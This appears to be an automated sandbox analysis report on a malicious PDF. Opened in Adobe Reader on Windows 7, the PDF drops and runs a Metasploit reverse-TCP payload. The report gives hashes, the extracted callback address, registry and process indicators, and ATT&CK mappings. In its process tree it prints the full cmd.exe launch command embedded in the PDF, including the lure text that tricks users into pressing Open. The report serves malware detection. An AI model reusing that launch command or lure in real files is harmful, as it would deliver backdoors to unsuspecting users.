metasploit | 717d1bd6c39e77d5df1880a965a559adbb0245e5e6ef114e5996e8569eb641a1

Analysis

max time kernel
118s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
09/11/2024, 11:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

717d1bd6c39e77d5df1880a965a559adbb0245e5e6ef114e5996e8569eb641a1N.pdf
Size

58KB
MD5

467bf335e2fb2df502d459987cb0ac80
SHA1

7f4ab40bef824ef104e37b22e875a82db0913c94
SHA256

717d1bd6c39e77d5df1880a965a559adbb0245e5e6ef114e5996e8569eb641a1
SHA512

f6985da9e003f48abd342b4b943a8b6b3ab56bc91d75f323cfa3df34f365456faa73ef9c072468795f2b2e8a2307ebf7e4199323f2a7d5ec8c417391b55718aa
SSDEEP

1536:TLcUj55OPHjvXoKeScFB0wTZ7/pcZzyDI:TQUF5CDwKeScFBpZaZzyDI

Score

10^/10

metasploit backdoor discovery trojan

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_tcp

192.168.0.172:4545

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Executes dropped EXE 1 IoCs

pid	Process
2976	form.pdf

Loads dropped DLL 2 IoCs

pid	Process
2864	cmd.exe
2864	cmd.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	form.pdf
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry class 31 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_Classes\Local Settings	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	AcroRd32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	AcroRd32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000	AcroRd32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy	AcroRd32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1"	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags	AcroRd32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1092616257"	AcroRd32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Sort = 000000000000000000000000000000000200000030f125b7ef471a10a5f102608c9eebac0a0000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	AcroRd32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	AcroRd32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\IconSize = "16"	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	AcroRd32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	AcroRd32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\LogicalViewMode = "1"	AcroRd32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	AcroRd32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\TV_TopViewVersion = "0"	AcroRd32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Mode = "4"	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	AcroRd32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}"	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}	AcroRd32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}"	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlgLegacy\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}	AcroRd32.exe
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	AcroRd32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	AcroRd32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	AcroRd32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000	AcroRd32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	AcroRd32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2380	AcroRd32.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2380	AcroRd32.exe
2380	AcroRd32.exe
2380	AcroRd32.exe
2380	AcroRd32.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2380 wrote to memory of 2864	2380	AcroRd32.exe	31
PID 2380 wrote to memory of 2864	2380	AcroRd32.exe	31
PID 2380 wrote to memory of 2864	2380	AcroRd32.exe	31
PID 2380 wrote to memory of 2864	2380	AcroRd32.exe	31
PID 2864 wrote to memory of 2976	2864	cmd.exe	33
PID 2864 wrote to memory of 2976	2864	cmd.exe	33
PID 2864 wrote to memory of 2976	2864	cmd.exe	33
PID 2864 wrote to memory of 2976	2864	cmd.exe	33

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\717d1bd6c39e77d5df1880a965a559adbb0245e5e6ef114e5996e8569eb641a1N.pdf"
1⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2380
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\form.pdf" (cd "Desktop"))&(if exist "My Documents\form.pdf" (cd "My Documents"))&(if exist "Documents\form.pdf" (cd "Documents"))&(if exist "Escritorio\form.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\form.pdf" (cd "Mis Documentos"))&(start form.pdf) To view the encrypted content please tick the "Do not show this message again" box and press Open.
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2864
- - \??\c:\Users\Admin\Documents\form.pdf
    form.pdf
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2976

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
d18b1995819a3fa646cc65d5ee6a3fa9

SHA1
ccbcc5b332941edbb01a8c058be04818677a795b

SHA256
8eaf55d3ee71bcfa318800986827fbffb06d3604d39eebf222e452ca03ba8ed5

SHA512
c475b7082a8f0fccefea9a3c6fd0400ee2ac91794f54d5274ddef6b6fca5be11979bd685d5b44ceb6feef4038ad411365bf355b14acded761e549d9df0262926

Download Submit
\??\c:\Users\Admin\Documents\form.pdf

Filesize
72KB

MD5
681073dbdc490e3abc412b115fb1180a

SHA1
883222a0ca4ec3878ad79aee8f5ca03da8ad13eb

SHA256
059b321e972583822e539f4aa4420d86e0ff512d957522807c1b7ed020f43a99

SHA512
03c609077e4cfa0e56aaafcb0b9c71afe1b18a675098d164f7f23faef58cf860f165ddd778754651b7c5b3a828d4c22c208d23c22e7e63bd9a02c8af91ee9d6c

Download Submit